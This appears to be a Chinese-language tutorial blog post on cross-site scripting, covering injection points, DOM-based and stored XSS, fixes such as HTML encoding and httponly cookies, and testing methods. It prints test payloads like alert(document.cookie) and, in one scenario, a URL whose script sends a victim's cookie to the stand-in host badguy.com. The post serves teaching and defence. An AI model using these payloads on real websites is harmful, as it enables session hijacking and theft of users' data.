XSS(跨站脚本攻击)

2012-12-09

XSS全称(CrossSiteScripting)跨站脚本攻击,是Web程序中最常见的漏洞。指攻击者在网页中嵌入客户端脚本(例如JavaScript),当用户浏览此网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的.比如获取用户的Cookie,导航到恶意网站,携带木马等。

XSS是如何发生的呢

假如有下面一个textbox

<inputtype="text"name="address1"value="value1from">

value1from是来自用户的输入,如果用户不是输入value1from,而是输入"/><script>alert(document.cookie)</script><!-那么就会变成

<inputtype="text"name="address1"value=""/><script>alert(document.cookie)</script><!-">

嵌入的JavaScript代码将会被执行

或者用户输入的是"onfocus="alert(document.cookie)

那么就会变成

<inputtype="text"name="address1"value=""onfocus="alert(document.cookie)">

事件被触发的时候嵌入的JavaScript代码将会被执行。攻击的威力,取决于用户输入了什么样的脚本

当然用户提交的数据还可以通过QueryString(放在URL中)和Cookie发送给服务器.

例如url:http://xxx.html?id=<script>alert(document.cookie)</script><!-

HTMLEncode

XSS之所以会发生,是因为用户输入的数据变成了代码。所以我们需要对用户输入的数据进行HTMLEncode处理。将其中的"中括号",“单引号”,“引号”之类的特殊字符进行编码。&gt;替换">",&lt;替换"<"等等。

XSS攻击场景

1.Dom-BasedXSS漏洞

攻击过程如下:

Tom发现了Victim.com中的一个页面有XSS漏洞,

例如:http://victim.com/search.asp?term=apple

服务器中Search.asp页面的代码大概如下

<html>

<title></title>

<body>

Resultsfor<%Request.QueryString("term")%>

...

</body>

</html>

Tom先建立一个网站http://badguy.com,用来接收“偷”来的信息。

然后Tom构造一个恶意的url(如下),通过某种方式(邮件,QQ)发给Monica

http://victim.com/search.asp?term=<script>window.open("http://badguy.com?cookie="+document.cookie)</script>

Monica点击了这个URL,嵌入在URL中的恶意Javascript代码就会在Monica的浏览器中执行.那么Monica在victim.com网站的cookie,就会被发送到badguy网站中。这样Monica在victim.com的信息就被Tom盗了.

2.StoredXSS(存储式XSS漏洞)

该类型是应用广泛而且有可能影响大Web服务器自身安全的漏洞,攻击者将攻击脚本上传到Web服务器上,使得所有访问该页面的用户都面临信息泄露的可能。攻击过程如下

Alex发现了网站A上有一个XSS漏洞,该漏洞允许将攻击代码保存在数据库中,Alex发布了一篇文章,文章中嵌入了恶意JavaScript代码。

其他人如Monica访问这片文章的时候,嵌入在文章中的恶意Javascript代码就会在Monica的浏览器中执行,其会话cookie或者其他信息将被Alex盗走。

Dom-BasedXSS漏洞威胁用户个体,而存储式XSS漏洞所威胁的对象将是大量的用户.

XSS漏洞修复

原则: 不相信客户输入的数据

注意:攻击代码不一定在<script></script>中

将重要的cookie标记为httponly,这样的话Javascript中的document.cookie语句就不能获取到cookie了.

只允许用户输入我们期望的数据。

例如: 年龄的textbox中,只允许用户输入数字。而数字之外的字符都过滤掉。

对数据进行HtmlEncode处理

过滤或移除特殊的Html标签,例如:<script>,<iframe>,&lt;for<,&gt;for>,&quotfor"

过滤JavaScript事件的标签。例如"onclick=","onfocus"等等。

如何测试XSS漏洞

方法一:查看代码,查找关键的变量,客户端将数据传送给Web服务端一般通过三种方式Querystring,Form表单,以及cookie.

例如在ASP的程序中,通过Request对象获取客户端的变量

<%

strUserCode=Request.QueryString(“code”);

strUser=Request.Form(“USER”);

strID=Request.Cookies(“ID”);

%>

假如变量没有经过htmlEncode处理,那么这个变量就存在一个XSS漏洞

方法二: 准备测试脚本,

"/><script>alert(document.cookie)</script><!--

<script>alert(document.cookie)</script><!--

"onclick="alert(document.cookie)

在网页中的Textbox或者其他能输入数据的地方,输入这些测试脚本,看能不能弹出对话框,能弹出的话说明存在XSS漏洞

在URL中查看有那些变量通过URL把值传给Web服务器,把这些变量的值退换成我们的测试的脚本。然后看我们的脚本是否能执行

方法三:自动化测试XSS漏洞

现在已经有很多XSS扫描工具了。实现XSS自动化测试非常简单,只需要用HttpWebRequest类。把包含xss测试脚本。发送给Web服务器。然后查看HttpWebResponse中,我们的XSS测试脚本是否已经注入进去了。

HTMLEncode和URLEncode的区别

HTML编码前面已经介绍过了,关于URL编码是为了符合url的规范。因为在标准的url规范中中文和很多的字符是不允许出现在url中的。

例如在baidu中搜索"测试汉字"。URL会变成http://www.baidu.com/s?wd=%B2%E2%CA%D4%BA%BA%D7%D6&rsv_bp=0&rsv_spt=3&inputT=7477

所谓URL编码就是: 把所有非字母数字字符都将被替换成百分号(%)后跟两位十六进制数,空格则编码为加号(+)。

相关推荐